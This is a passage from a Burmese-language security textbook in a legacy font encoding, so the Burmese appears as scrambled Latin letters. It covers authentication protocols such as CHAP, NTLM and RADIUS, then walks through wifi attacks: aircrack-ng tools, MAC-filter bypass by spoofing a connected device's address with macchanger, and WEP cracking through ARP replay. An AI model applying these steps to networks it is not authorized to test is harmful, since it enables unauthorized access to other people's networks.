Authentication rsdK;udkvnf; uRefawmfwdkY BuHKzkl;Muovdk tvm;wl tjcm;yHkpHeJY
Authenticate vkyfEdkifatmif pDpOfxm;wJh enf;ynmawGudkvnf; uRefawmfwdkY
odMuygw,f/ 'gayr,fh uRefawmfwdkY ,aeY toHk;rsm;wmu One Factor
Authentication enf;vrf;yJ jzpfaeygw,f/
Multi-factor authentication udk toHk;jyKr,fqdk&ifawmh tjcm;aom
enf;ynm&yfawGudkyg xyfrH pOf;pm;&rSmjzpfygw,f/ Oyrm - password awGtjyif
smart card awGeJY Authenticate vkyf&wmrsdK;aygh/ (EdkifiHjcm; Zmwfum;awG xJrSm
jrifzl;aeus jzpfrSmyg)
 Smart card awGrSm Card holder udk identify vkyfay;Edkifr,fh magnetic
field yg0ifygw,f/ 'gaMumifh user name, password eJY smart card udk toHk;jyKw,f
qdk&if 'g[m multi-layer authentication jzpfygw,f/ wpfpHkwpfa,mufu oifh&JU
user name & password udk odoGm;&ifawmif card udk yHkwlvkyfzdkY
tqifrajywmaMumifh ydkjyD; pdwfcs vHkjcHKrI &Sdapwmaygh/ Facebook Account &
gmail account awGudk Login Approval jyKvkyfjyD; uRefawmfwdkY oHk;aeusovdkrsdK;
ygyJ/
'gawGtjyif Fingerprint, eye scanners, voice recognition pwJh
enf;vrf;awGudkvnf;yJ toHk;jyKEdkifygao;w,f/ Token generator awGudk
toHk;jyKjyD; OTP vdkYac:wJh One Time Password udkvnf; toHk;jyKEdkifygao;w,f/
Facebook & Gmail wdkYrSm Login 0ifwJhtcg ydkYay;wJh code awGonfvnf; OTP
trsdK;tpm;xJrSm yg0ifygw,f/ oifhtaeeJY wpfBudrfom toHk;jyKEdkifrSmrdkYygyJ/
Multi-factor authentication udk category 3rsdK;eJY pOf;pm;vkyfaqmifavh
&SdMuygw,f/ bmawGvJqdkawmh
Category A = Something you know (e.g. Passwords, PIN, ...)
Category B = Something you have (e.g. smart card, ...)
Category C = Something you are (e.g. fingerprint, eye, voice, ...) jzpfMuygw,f
Token Generator mechanism rSmawmh regular OTP, hashed OTP &
time-based OTP qdkjyD; oHk;rsdK; yg0ifwmudk awGY&ygw,f/ OTP onf tvGef vHkjcHKrI
&SdjyD; Hacker awGtaeeJY BudKwifcefYrSef;zdkY b,fvdkrS rvG,fulEdkifwJh security
mechanism wpfck jzpfygw,f/ bmaMumifhvJqdkawmh random taeeJY generate
vkyfvdkufwJh password awGudk zefwD;zdkYtwGuf rnfonfh formula udkrQ oHk;rxm;vdkY
jzpfygw,f/ OTP pepfudk uRefawmfwdkYEdkifiHrSmvnf; Mobile Banking tcsdKUrSm
toHk;jyKaewm awGY&ygw,f/ Login approval vkyfxm;wJh Facebook & Google
account awGudk Application uae 0ifa&mufwJhtcgrSmvnf; xdkYtwlygyJ/
time-based OTP udkawmh uRefawmfwdkY aeYpOf oHk;aewJh Facebook Application &JU
Code Generator rSm avhvmEdkifygw,f/

Authentication Protocols
Security & Usage rwlnDwJh authentication protocol rsm;pGmudk
ESpfaygif;rsm;pGmtwGif;rSm toHk;jyKcJhMuygw,f/ Oyrmajym&&if corporate network
wpfckudk wpfae&muae connect vkyfEdkifzdkYtwGuf PPP vdkYac:wJh Point-to-Point
Protocol udk toHk;jyKcJhMuygw,f/ PPP rSm user udk authenticate vkyfEdkifzdkYtwGuf
PAP eJY tjcm;enf;vrf;awGudk toHk;jyKMuygw,f/ PAP qdkwmuawmh Password
Authentication Protocol jzpfygw,f/ vHkjcHKa&; tm;enf;wmaMumifh
roHk;oifhygbl;/
PAP tpm; CHAP udk toHk;jyKEdkifygw,f/ Challenge-Handshake
Authentication Protocol (CHAP) [m Client a&m Server a&m ESpfbufvHk;rSm
vQdKU0SufjyD; sharing jyKvkyfay;ygw,f/ xdk secret udk tifwmeufay: transmit
vkyfrSmr[kwfygbl;/ MS-CHAP uawmh CHAP udkyJ Microsoft uae rGrf;rHzefwD;
xm;wm jzpfygw,f/ Client a&m Server uae Secret key awGudk
odp&mrvdkawmhwJh enf;yg/

CHAP Vs MS-CHAP
a&SUrSm aqG;aEG;cJhovdkygyJ/ CHAP rSmu Client a&m Server a&m
ESpfbufvHk;rSm Secret key udk odaezdkY vdktyfygw,f/ client & server Mum; link
wpfck csdwfqufqufoG,fjyD; yxrtqifhtaeeJY server u challenge key wpfck
zefwD;ay;ydkYygw,f/ client u One-Way hash function udk oHk;jyD; key awGudk
share ygw,f/ jyD;awmh Server qD jyefydkYay;ygw,f/ server uvnf; same hash
algorithm udkoHk;jyD; challenge hash value eJY shared key udk wGufcsufygw,f/
response ESpfckudk EIdif;,SOfjyD; match jzpf&if authentication udk grant
ay;vdkufygw,f/ match rjzpf&ifawmh ay;r0ifawmhbl;aygh/
MS-CHAP udkawmh Windows uGefysLwmawGMum; wpfae&mpDuae
csdwfqufEdkifatmifvdkY Microsoft uae zefwD;xm;cJhwmjzpfygw,f/ MS-CHAP eYJU
&dk;&dk; CHAP Mum;rSm uGmjcm;rIawG &Sdygw,f/ MS-CHAP rSm plain-text (or)
password awGudk odkavSmifzdkY authenticator rvdktyfawmhygbl;/ MS-CHAP onf
Authenticator-controlled authentication retry eJY password changing
mechanism wdkYudkyg axmufyHhay;xm;ygw,f/
MS-CHAP &JU 'kwd, version udk January, 2000 rSm xkwfoHk;cJhygw,f/
mutual authentication udk vkyfaqmifEdkifvmwmrdkY client & server ESpfbufvHk;u
wpfbufeJYwpfbuf tjyeftvSef authenticate vkyfEdkifvmygw,f/ Authentication
server uae verificcation request udk client xH ay;ydkYygw,f/ client u user
name eJY response vkyf&ygw,f/ Secure Hash Algorithm (SHA) onf &vmwJh
challenge string udk hash jyKvkyf&ygw,f/ Authentication server onf Client &JU
response udk ppfaq;jyD; success (or) failure jzpfaMumif; notification
jyefydkYay;&ygw,f/
NTLM
NTLMv1 udk Windows NT 4.0 eJY a&SUydkif; version awGrSm oHk;cJhygw,f/
LM eJY NT udk hashing algorithm tjzpf oHk;xm;wmaMumifh tawmfhudk vHkjcHKa&;
tm;enf;ygw,f/ NTLMv2 uawmh ydkrdkvHkjcHKrI&SdvmjyD; ,aeYxd oHk;aeqJ
jzpfygw,f/ NTv2 eJY LMv3 hashing tjyif RC4 cipher udkyg oHk;xm;wmaMumifh
NTLMv1 xuf tqaygif;rsm;pGm vHkjcHKrIydkoGm;wm jzpfygw,f/ NTLM
Authentication u atmufygtwdkif; vkyfaqmifygw,f/
1/ user onf client computer uae domain name, user name eJY password awG
jznfhoGif;&ygw,f/ tJvdk jznfhoGif;wJhae&mrSm actual password udk y,fzsufvdkufjyD;
cryptographic hash tjzpf ajymif;vJvdkufygw,f/
2/ client onf user name udk plain-text tjzpf server xH ay;ydkYygw,f/
3/ server u challenge vdkYac:wJh 64byte random number udk xkwfjyD; client xH
ay;ydkYygw,f/
4/ client u server &JU password hash awGeJYtwl challenge udk encrypt vkyfjyD;
server xH jyefydkYygw,f/ 'gudk response vdkY owfrSwfygw,f/
5/ server onf user name &,f? client xH ay;ydkYvdkufwJh challenge &,f? client
qDu jyefvmwJh response &,f (3ckvHk;)udk domain controller xH
ay;ydkY&jyefygw,f/
6/ Domain controller onf SAM (Security Account Manager) xHrS user &JU
password hash awGudk user name eJY wdkufqdkif&SmazGjyef,lvmjyD; challenge udk
encrypt vkyfzdkYtwGuf xdk hash awGudk toHk;jyK&ygw,f/
7/ Domain controller uyJ Step 6 rSm &vmwJh encrypted challenge eJY step 4 rSm
&vmwJh response udk EIdif;,SOf&ygw,f/ wpfxyfwnf;usw,fqdk&ifawmh
Authentication onf successful jzpfjyD jzpfygw,f/
Microsoft &JU MS-CHAP onf vHkjcHKrI&Sdonfqdkaomfjim;vnf; smart
card awG PEAP awGavmufawmh vHkjcHKrI ray;Edkifygbl;/ 'DtaMumif;awGudkawmh
csefcJhvdkufyg&ap/ pmt&rf;&SnfrSmpdk;wmaMumifhyg/
'Dtcef;rSm aqG;aEG;wmawGu pmawGcsnf;yJrdkY ysif;aejyDvm;/
'DtcsufawGeJY cryptography udk rodrjzpf od&SdzdkY vdktyfvdkY 'Dtcef;awGudk
xnfhoGif;ay;xm;&jcif; jzpfygw,f/ uRefawmfwdkYtaeeJY pwif avhvmp rSm
'gawGudk rodbJawmh 'DhxufykdrdkomvGefwJhtqifhudk a&mufEdkifzdkY rvG,fygbl;/
Hacker/Pen-tester wpfa,muf&JU txl;vdktyfwJht&nftcsif;u pdwf&Snfonf;cH
Edkifjcif;yJ jzpfygw,f/ uRefawmfwdkYtm;vHk; 'Dtqifhav;awGudk pdwf&Snf&Snfav;
xm;jyD; pmtkyfausmfrvSefrdzdkY BudK;pm;Mu&atmifcifAs/
Triple A (AAA)
AAA udkawmh uRefawmfwdkY Mum;zl;aumif; Mum;zl;Muygvdrfhr,f/
Authentication, Authorization & Accounting qdkjyD;awmh jzpfygw,f/ security
network wpfcktwGuf AAA onf r&Sdrjzpf vdktyfcsufwpfckyg/ uRefawmfwdkY
'Drwdkifcif authentication protocol awGtaMumif; tenf;i,f aqG;aEG;cJh
Muygw,f/ 'gawG[m A wpfvHk;yJ &Sdygao;w,f/
Authentication qdkwJh A yg/ AAA udk wjydKifeufwnf; vkyfaqmif
Edkifwmawmh &Sdygw,f/ RADIUS yg/ Remote Authentication Dial-in User
Service system (RADIUS) uawmh user &JU action awGay:authenticate,
authorize & audit awGudk vkyfaqmifEdkifygw,f/ Microsoft wdkYvdkY vendor
rsm;pGmu implement vkyfxm;wmjzpfjyD; authentication message awGtwGuf
UDP port 1812 eJY Accounting twGuf UDP port 1813 wdkYudk toHk;jyK
xm;ygw,f/ older version awGrSmawmh UDP port 1645 eJY 1646 wdkYudk toHk;jyK
xm;ygw,f/
RADIUS vdk wlnDpGmvkyfaqmifEdkifwJh tjcm; system awGvnf;
&Sdaeygao;w,f/ Terminal Acccess Controller Acccess-Control System
awGaygh/ TACAS wdkY? TACACS+ wdkYeJY Cisco urGrf;rHxm;wJh XTACACS wdkY
ponfjzifh rsm;pGm usef&Sdygao;w,f/
pmawGcsnf; zwfae&vdkY ysif;roGm;ygeJYcifAs/ tajccH odrS jzpfrSmawGudk
xnfhoGif;aqG;aEG;xm;rSom oufqdkif&m u@awGrSm ydkjyD; em;vnfEdkifrSmrdkY
jzpfygw,f/ oabmw&m;awGqdkwm azmuf0if&r,fh vrf;aMumif;twGuf t"du
tcGifhtvrf;jzpfwmrdkY oabmw&m;awGudk em;vnfxm;avav ydkrdkaumif;rGef
avav jzpfygaMumif; aqG;aEG;&if;eJY aemufwpfcef;rSm jyefvnf
qHkawGY&atmifcifAsm/
CHAPTER 14: Wireless Network & Wifi Hacking

Introduction

'Dtydkif;uawmh tawmfrsm;rsm; pdwf0ifpm;MuwJh tydkif; jzpfygw,f/

cufcJwJhu@vnf; r[kwfwmaMumifh em;vnf&vnf; vG,fulygw,f/ xHk;pHtwdkif;
odoifhwmav;awGudk BudKjyD; aqG;aEG;OD;rSmrdkY cPawmh onf;cHzwfay;ygOD;cifAsm/
Wireless network toHk;jyKrIawGu ydkrdkwGifus,fvmwmudk awGYjrifae&
wJh ,aeYacwfrSmawmh Wireless Hacking udkvnf; ydkjyD; pdwf0ifpm;vmwm
rqef;vSygbl;/ tifwmeuf oHk;onfjzpfap roHk;bl;jzpfap wireless network udk
toHk;jyKjyD; local (internal) rSm connection jyKvkyfoHk;ae&wJh pD;yGm;a&;vkyfief;
trsm;pk &SdMuygw,f/ Oyrmajym&&if uGefysLwmta&mif;pepf toHk;jyKwJh (Stock
Management Software) oHk; vkyfief;awGrSmvnf; network csdwfqufwJhae&mrSm
BudK;rJhpepf (wifi) udk toHk;jyKvmMuwm awGY&ygw,f/ tcsdKU pm;aomufqdkifawGeJY
vufbuf&nfqdkifawGrSmyg Tablet uav;awGudk udkifaqmifxm;wJh
0efxrf;av;awGu 0efaqmifrIay;aewmudk jrifawGYEdkifygw,f/
'gawGwifruao;ygbl;/ wifi free qdkifawG? vpOfaMu;eJY oHk;&wJh wifi
vdkif;awG pwmawGvnf; uRsefawmfwdkY ywf0ef;usifrSm awGYjrifaeMuygw,f/ 'g[m
wireless toHk;jyKrI wGifus,fvmjcif;udk azmfjywmjzpfygw,f/ wifi udk wGifus,fpGm
oHk;aeMuovdkyJ wireless network udk vHkjcHKrI&SdapzdkY toHk;jyKwJh enf;pepfawGvnf;
&SdcJhygw,f/ 'gayr,fh vHk;0OóHk vHkjcHKrIudkawmh ray;pGrf;EdkifMuygbl;/
EdkifiHtawmfrsm;rsm;u Organization tBuD;pm;awGeJY Government
tzGJYtpnf;trsm;pkrSm wireless technology udk wyfqifoHk;pGJcGifh ydwfxm;ygw,f/
taMumif;uawmh vHkjcHKa&;ydkif;rSm pdwfrcs&vdkYyJ jzpfygw,f/ wireless network u
wired network avmuf vHkjcHKrI ray;EdkifvdkYjzpfygw,f/ 'gayr,fh wireless network
oHk;pGJrIu usqif;roGm;wJhtjyif ydkjyD;awmif wdk;wufvmaeygao;w,f/
Oyrmajym&&if uRefawmfwdkY rdrdzkef;uae tifwmeufvdkif;udk uGefysLwmqD
jyefrQoHk;wJhtcgrSmawmif wifi vTifhjyD; toHk;jyKaejzpfwmu ydkrsm;ygw,f/ USB
tethering vkyfjyD; toHk;jyKrIu enf;aeygao;w,f/ 'g txif&Sm;qHk; oufaoygyJ/
Wireless Attack taMumif; rqufrDaygh/ Wireless Attack wpfck
vkyfaqmifEdkifzdkYtwGuf yxrqHk;taeeJY uRefawmfwdkY&JU uGefysLwmrSm wifi card
wpfckawmh tenf;qHk;&Sd&ygr,f/ Build-in yg0ifwJh wireless card awGu wireless
vdkif;qGJtm;tjyif tjcm;tm;enf;csufawGvnf; &SdaewmaMumifh jzpfEdkif&if high
power external interface wpfckavmufawmh vdktyfygw,f/
 Alpha card awGuawmh aps;uGufrSm 0,f,l&&SdEdkifwJhtxJrSm
emrnfaumif;xGufygw,f/ vdkif;qGJtm;aumif;rGefovdk high power output
aMumifhvnf; oHk;&wm ydkjyD; tqifajyaprSmyg/ tu,fí oifu VirtualBox vdk?
VMWare wdkYvdkrSm Kali Linux udk Attacker Machine tjzpf toHk;jyKr,fqdk&if
external card onf r&Sdrjzpf vdktyfvmrSmjzpfjyD; Alpha card awGu oifhudk ydkjyD;
pdwfauseyfrI ay;Edkifygvdrfhr,f/

uRefawmfwdkYqDrSmawmh Alpha u 0,f&cufygw,f/ tjcm; brand

awGudkawmh uGefysLwmqdkifawGrSm tvG,fwul &&SdEdkifygw,f/ (aps;EIef;rSm
wpfaomif;usyfrS oHk;aomif;usyef0ef;usiftwGif; toD;oD;&SdwmrdkY a&G;cs,f0,f,l
Edkifygw,fcifAs)/
tcsdKUaom AP (Access Point) awGu ay 300 avmufxdyJ broadcast
vkyfEdkifwmrdkYvdkY ('gawmif t&Htwm;r&SdrS) uRefawmfwdkYtaeeJY connect
vkyfr,fqdk&if tvGef eD;uyfpGm &SdaezdkY vdktyfygw,f/ Alpha card awGxJrSmawmh
Signal awGudk ydkjyD;zrf;rdEdkifapr,fh yHkpHawG yg0ifwmrdkY tawmfa0;ae&ifawmif
tqifajyajy vkyfaqmifEdkifwmudk awGYjrif&ygw,f/
 wireless attack trsm;tjym;onf "Deauthentication Packet" ay:
rlwnfvkyfaqmifavh&Sdygw,f/ Alpha card awG[m deauthentication packet awG
udk tcsdefwdkwdktwGif;rSm trsm;BuD; xkwfvTwfay;Edkifwmuvnf;
tm;omcsufwpfck jzpfygw,f/ (0,fr&ygbl;qdkrS nTef;aeovdk jzpfaejyD/ :))

Aircrack Suite
aircrack-ng onf wireless network auditing twGuf aumif;rGefwJh
tool wpfckjzpfjyD; 802.11, WEP eJY WPA-PSK key awGudk cracking jyKvkyfwJh
program wpfcktjzpf toHk;jyKEdkifygw,f/ aircrack-ng rSm wireless connectivity
udk attack vkyfEdkifzdkYtwGuf tool awG yg0ifaeygao;w,f/
airbase-ng onf client udka&m AP udkyg attack vkyfEdkifzdkYtwGuf
toHk;jyKwJh multipurpose tool wpfckjzpfygw,f/ aircrack-ng uawmh 802.11,
WEP eJY WPA-PSK key awGudk cracking jyKvkyfwJh program wpfckjzpfygw,f/
airdecap-ng u WEP/WPA/WPA2 capture file awGudk decrypt
jyKvkyfay;ygw,f/ airdrop-ng uawmh rule-based wireless authentication tool
wpfckjzpfjyD; aireplay-ng uawmh wireless frame awGudk inject & replay
jyKvkyfEdkifygw,f/ airmon-ng uawmh wireless interface udk monitor mode tjzpf
ajymif;ay;wmeJY monitor mode udk disable jyefvkyfay;wmawGudk jyKvkyfay;
Edkifygw,f/ airodump-ng uawmh raw 802.11 frame awGudk capture
jyKvkyfay;Edkifygw,f/ 'gawGu aircrack-ng rSm yg0ifwJh tool awGudk tusOf;csKyf
rdwfqufay;wmjzpfjyD; 'gawGudk odrSwfxm;zdkY vdktyfygw,f/
WEP pepfwpfckudk crack MunfhzdkYtwGuf aircrack-ng suite xJu tool
tajrmuftrsm; vdktyfygw,f/ Oyrmt&ifxkwfajymxm;ygr,f/ tcsdKUudk
rSwfxm;zdkY vdktyfygw,f/ (rSwfxm;&rSmu 'gu wpfqifhpDudk &Sif;jyjcif;om
jzpfygw,f/ jyD;&if wpfckpD&JU vufawGYudk xyfazmfjyOD;rSmyg/ 'Dtqifhu
ta&;BuD;ygw,f/)

yxrqHk;taeeJY Terminal rSm airmon-ng start wlan0 vdkY

&dkufxnfhvdkufygr,f/ 'guuRefawmfwdkY&JU wireless interface udk monitor mode
tjzpf ajymif;ay;rSmjzpfygw,f/

monitor enabled on mon0 jzpfoGm;jyDqdk&ifawmh aemufwpfqifhtaeeJY

airodump-ng wlan0 eJY teD;tem;rSm &&SdEdkifwJh AP awGudk Scan ygr,f/

BSSID qdkwmu AP &JU MAC Address udk qdkvdkwmjzpfjyD; CH uawmh

channel udk qdkvdkygw,f/ ENC uawmh AP uae toHk;jyKxm;wJh Encryption udk
qdkvdkwmjzpfjyD; ESSID uawmh AP &JU Name (wifi name) jzpfygw,f/
uRefawmfwdkY&JU Target Network udk &SmawGYjyDqdk&ifawmh Control+C udk ESdyfjyD;
&yfwefYEdkifygw,f/

airodump-ng onf target AP twGuf listener tjzpf pwif

vkyfaqmifygw,f/ AP &JU b,f channel vJqdkwmudk cGJjcm;EdkifzdkYtwGufawmh -c udk
toHk;jyKEdkifygw,f/ -w uawmh (aemufydkif;rSm crack vkyf&r,fh a'wmawG yg0ifwJh)
capture file udk specify vkyf&ygw,f/ - -bssid uawmh AP &JU Name (connect
vkyfrnfh wifi connection name) jzpfygw,f/
 yHkrSm DATA count qdkwmudk awGYEdkifygw,f/ 'DeHygwfawGonf password
udk crack &mrSm tvGef ta&;ygwJhzdkifawG jzpfygw,f/

'DyHkrSmMunfh&if target AP rSm csdwfxm;wJh device awG&JU MAC address

awGudk awGY&ygr,f/ wu,fvdkYrsm; wpfckrS rawGY&bl;qdk&ifawmh password udk
crack zdkYu ydkjyD;cufoGm;ygjyD/
airplay-ng &JY primary function u aircrack-ng uae WEP cracking
EdkifzdkYtwGuf traffic awGudk generate vkyfay;EdkifzdkYjzpfygw,f/ oHk;p&m option 1 &
option 0 qdkjyD; &Sdygw,f/ option 1 onf AP xH Fake authentication udk csufcsif;
ay;ydkYygw,f/
'DaemufrSmawmh -3 option udk oHk;jyD;awmh ARP request "replay attack"
udk pwifvkyfaqmifygw,f/ classic ARP request replay attack u new
intialization vectors (IVs) udk generate vkyf&mrSm txda&mufqHk;aom enf;vrf;
jzpfygw,f/ ,HkMunfpdwfcs&qHk;vnf; jzpfygw,f/ program u ARP packet udk
listen vkyfjyD; AP xH jyefvnf transmit jyKvkyfygw,f/ ARP packet awGudk
xyfcgxyfcg xkwfvTwfjcif;tm;jzifh AP uae response jyefvmr,fh new IV
awGuaewpfqifh WEP key udk &,lwmjzpfygw,f/
uRefawmfwdkYqDrSm vHkavmufwJh ARP packet awG &jyDqdk&ifawmh
aircrack-ng udk oHk;jyD; &vmwJh captured IVs awGudk crack edkifygjyD/ crack
jyD;qHk;zdkYawmh tcsdeftenf;i,f Mumjrifhygr,f/

Hacking MAC Filtering Wifi

uRefawmfwdkY ywf0ef;usifu wifi vdkif;awGxJrSm tcsdKUu password
cHxm;wmrsdK;r&SdbJeJY csdwfoHk;r&bl;qdk&ifawmh aocsmjyD 'g[m Mac Filtering
vkyfxm;wmygyJ/ uRefawmfwdkY toHk;jyKaeMuwJh device tawmfrsm;rsm;rSm Mac
Address qdkwm ygygw,f/ Wifi card &JY address vdkY tvG,f rSwf,lEdkifjyD; Device
awGrSm MAC adddress csif; rwlnDMuygbl;/
'gaMumifh tcsdKUu olwdkY&JU Wifi uGef,ufudk vHkjcHKrI&SdapzdkYtwGuf MAC
address awGudk ppf,lwJhenf; (MAC address awGudk BudKwifxnfhxm;&jyD;
vma&mufcsdwfqufwJh device awGwdkif;&JU MAC Address awGudk
wdkufqdkifppfaq;um wlnDrS csdwfqufcGifhjyKwJh password rvdkwJh enf;) udk
toHk;jyKMuavh&Sdygw,f/ 'gayr,fh 'g[m Kali Linux vdk Linux rsdK;udk oHk;olawG
twGufuawmh vHkjcHKwJh enf;vrf;wpfck r[kwfapygbl;/ 'ghjyif xdk network rSm
vuf&Sd oHk;aewJh wpfpHkwpfa,muf&JU zkef; (odkYrpkwf) uGefysLwmudk cPiSm;Munfh&HkeJY
Mac Address udk od&Sd ul;,lvmEdkifjyD; tvG,fwul vdkufajymif;EdkifwmrdkYvdkY Linux
user r[kwfolawGtwGufawmif vkyf,lvdkY&wJh enf;wpfck jzpfaeygw,f/
ckuawmh Kali Linux uae Mac Filtering vkyfxm;wJh wifi pepfudk
ausmfjzwfMunfh&atmifyg/ tpuae pjyD; ajymjyyg&ap/

txufyg yHkrSm Munfh&if Test Wifi qdkwJh vdkif;wpfckrSm Password

rygwmudk awGYjrif&rSmyg/ olYudk a&G;cs,fjyD; connect vkyfMunfhwJhtcg connected
oauFwjzpfwJh trSefjcpfav;udk jyygvdrfhr,f/
 Connected jyayr,fhvdkY tifwmeufoHk;vdkYvnf;r& connection r&
jzpfaewmudk awGY&ygr,f/ 'gqdk&ifawmh tJonf wifi connection rSm security
taeeJY MAC Address Filtering udk toHk;jyKxm;wmvdkY odEkdifygw,f/ (rSwfcsuf/
/ Android zkef;awGrSmoHk;wJh Zapya ul;vdkY jzpfvmwJh Wifi vdkif;rsdK;udkrqdkvdkyg/
zkef;uae tifwmeufrzGifhbJ wifi vTifhxm;&ifvnf; csdwfrdjyD; tifwmeuf&rSm
r[kwfyg/ MAC filtering rSmu oHk;cGifhjyKxm;wJholawGu oHk;vdkY&aejyD;
udk,f0ifcsdwfrS oHk;vdkY r&wmrsdK; jzpfygw,f/)
uRefawmf azmfjyaqG;aEG;cJhovdkygyJ/ MAC Filtering Wifi vdkif;wpfckck
BuHKcJhjyDqdk&ifawmh ck azmfjyr,fh enf;vrf;awGtwdkif; vdkufjyD csdwfqufEdkifrSm
jzpfygw,f/ (Android uae hotspot vTifhoHk;wJhtcgawmh MAC filtering r&Edkifyg)

yxrqHk;taeeJY rdrdwdkY&JU Wifi interface udk od&SdzdkYtwGuf airmon-ng eJY

ac:MunfhEdkifygw,f/ yHkxJrSm Munfh&if Interface qdkwm&JY atmufrSm wlan0 qdkjyD;
azmfjyxm;wmudk awGY&ygr,f/ (wlan zero) yg/ 'gqdk&if uRefawmfh&JY Interface u
wlan0 jzpfygw,f/ 0 ae&mrSm 1 qdk&ifvnf; wlan1 aygh/

yHkxJutwdkif; airodump-ng wlan0 eJY oGm;Munfhvdkufawmh

atmufygtwdkif; jrif&ygw,f/

bmawGu bmudkqdkvdkw,fqdkwmudk uRefawmf a&SUrSm BudKwifaqG;aEG;

xm;jyD;jyDaemf/ 'Dae&mrSm MunfhvdkufwJhtcgrSmvnf;yJ

t"du azmfjyr,fhtydkif;udk a&G;xkwfxm;wmjzpfygw,f/ yHkrSmMunfh&if

BSSID u 02:2B:32:9E:C2:A4 jzpfjyD; CH u 1, ENC rSm OPN (Open) vdkY
awGY&rSmyg/ tJonfvdkif;rSm MAC Address udk Filter vkyfxm;wmrdkY olYqDrSm
vuf&Sd csdwfqufoHk;aewJh Device awG&JU MAC Address udk od&SdzdkYvdkvmygw,f/
BSSID udk copy ,lvdkufyg/ (02:2B:32:9E:C2:A4)/ jyD;&if vdkcsifwmawGYjyDrdkYvdkY
control+c udk ESdyfjyD; command line qD jyefEdkifygjyD/ 'grSr[kwf Terminal
aemufwpfckzGifhoHk;Edkifygonf/

oHk;vdkufwmu &Sif;ygw,f/ airodump-ng udkyJ oHk;xm;ygw,f/ -c

aemufrSm cke tay:tqifhrSm &SmawGYvmwJh CH (Channel) udk xnfhoGif;&ygr,f/
CH rSm 1 yJjrifcJhvdkY 1 udk oHk;xm;ygw,f/ - -bssid &JU aemufrSm cke ul;,lxm;wJh
BSSID eHygwfudk jznfhvdkufygw,f/ wlan0 qdkwmuawmh interface yg/
em;vnfr,fxifygw,f/
 yHkrSmMunfh&if CH 1, BSSID 02:2B:32:9E:C2:A4 rSm oHk;aewJh device
awGudk jrif&ygvdrfhr,f/ uRefawmfuawmh tay:yHkrSm device wpfckwnf;udkyJ
jyxm;ygw,f/ tJonfrSmjyefMunfhr,fqdk&if

txufygyHktwdkif; jrif&ygr,f/ vdktyfwJhtydkif;udk uGuf,ljyjcif;

jzpfygw,f/ tJonfrSm Munfhr,fqdk&ifawmh uRefawmfwdkY&JU Target Network
(BSSID) rSm toHk;jyKaewJh deice &JU MAC address udk STATION &JU atmufrSm
awGY&rSmjzpfygw,f/ txufygyHkt&qdk&if 74:23:44:20:39:2F jzpfygw,f/
copy ,lxm;vdkufyg/ (vdkcsifwJh used device's MAC address &jyDrdkYvdkY Control+c eJY
jyefxGufEdkifw,faemf/ aemufqdk jyefxGufwJhtaMumif; xnfhrajymawmhbl;aemf)

vuf&Sd Wifi card udk jyKjyifp&m tenf;i,f&SdwmaMumifh yHkxJutwdkif;

service network-manager start eJY ifconfig wlan0 down vdkY wpfaMumif;pD
&dkufvdkufyg/ jyD;oGm;&ifawmh uRefawmfwdkY&JU MAC Address udk ajymif;vJ
EdkifjyDjzpfygw,f/

MAC address ajymif;vJ&ef MAC Changer udk toHk;jyKEdkifygw,f/

macchanger vdkY a&;&rSmyg/ -m u MAC address xnfhr,fqdkwmudk odatmif
azmfjy&wmjzpfjyD; aemufrSm cke ul;xm;wJh MAC address udk xnfhvdkufyg/ jyD;&if
Interface jzpfwJh wlan0 udk xnfhoGif;&ygr,f/ jyD;&ifawmh enter vdkufr,fqdkygu
txufygyHktwdkif; current mac address, Parmanent MAC eJY New MAC qdkjyD;
awGYvm&ygr,f/ New MAC: u cke aumfyD,lxm;wJhtwdkif; ajymif;oGm;wmyg/
 jyD;&if cke down xm;wJh wlan0 udk up jyefvkyf&rSmjzpfygw,f/ txufyg
yHktwdkif; wpfaMumif;pD &dkufxnfhvdkufyg/ jyD;&ifawmh cPapmifhjyD; Wifi icon
av;jyefay:vmjyDqdk&ifawmh Connect jyKvkyfvdkufEdkifjyDjzpfygw,f/

txufyg yHkxJutwdkif; wifi connected jzpfaMumif; jyaerSmjzpfjyD;

internet access vnf; &&SdjyDjzpfygw,f/

WEP Cracking
'Dcgawmh WEP wifi security system udk Crack Munfh&atmifyg/

tay:rSm &Sif;jychJovdkygyJ/ airmon-ng u wifi interface udk odatmif

oHk;wmyg/ interface u wlan0 vdkY awGY&ygjyD/

'DtqifhrSm airmon-ng start wlan0 eJY wlan0 interface udk Monitor

Mode (mon) ajymif;vdkufwm jzpfygw,f/ interface ae&mrSm wlan0mon vdkY
awGYae&ygjyD/ (uRefawmfwdkYu external wifi adapter (Alpha) udk
oHk;r,fqdk&ifawmh PID & Name eJY a&;jyxm;wJh process awGudk kill vdkufvdkY
&ygw,f)/

ckqdk&ifawmh trouble jzpfapEdkifr,fh process awG r&Sdawmhygbl;/

uRefawmfwdkY ywf0ef;usifrSm &&SdEdkifwJh wireless network awGudk listen &atmif/

'gu cPcP&SdjyDrdkY &Sif;rjyawmhbl;aemf/ 'gqdk&ifawmh uRefawmfwdkY

ywf0ef;usifrSm &EdkifwJh wifi connection awGudk ckvdk azmfjyay;aeygjyD/

ck uRefawmfwdkY avhvmrSmu WEP jzpfygw,f/ WPA2 r[kwfao;ygbl;/

txufygyHkrSmMunfh&if WEP wpfckudk awGYjrif&rSmyg/

jrifomatmif wpfaMumif;wnf; a&G;jywmyg/ 'Dtay:u yHkrSmMunfh&if

acgif;pOfawGudkyg jrif&rSmyg/

CH 14 rSmvnf; ckvdk xyfawGY&ygao;w,f/ uRefawmf erlemjyr,fh vdkif;

u ckyHkrSm jc,fjyxm;wJh vdkif;yg/
 &SmcsifwJh vdkif;vnf; awGYjyDqdkawmh control+c eJY jyefxGufvdkufyg/ jyD;&if
BSSID ae&mrSm&SdaewJh MAC Address udk copy ul;yg/

uRefawmf ul;vdkufwJh (prf;Munfhr,fh) vdkif;udk CH Munfhawmh CH

acgif;pOfwyfxm;wJh Column rSm 10 qdw k mudk awGYygw,f/ CH u 10 aygh/

aemufxyf Terminal topfwpfck xyfzGifhjyD; airodump-ng wlan0 eJY

RUN xm;yg/ jyD;&if aemufxyf new terminal zGifhyg/

a&;&r,fhyHkpHu airodump-ng -c (CH) -w capture1 - -bssid (MAC Add)

mon0 yg/ CH u 10 jzpfjyD; MAC Address uawmh cke copy ,lxm;jyD;om;
Address jzpfygw,f/ -w u capture jyKvkyfr,fh wireless data twGufyg/ capture
(or) capture1 tqifajyovdk ay;vdkY &ygw,f/ udk,fay;wmawmh
udk,frSwfxm;&ygr,f/
 Data 1200
ausmfavmuf &wJhtxd cP apmifhvdkufygw,f/ atmifjrifzdkY
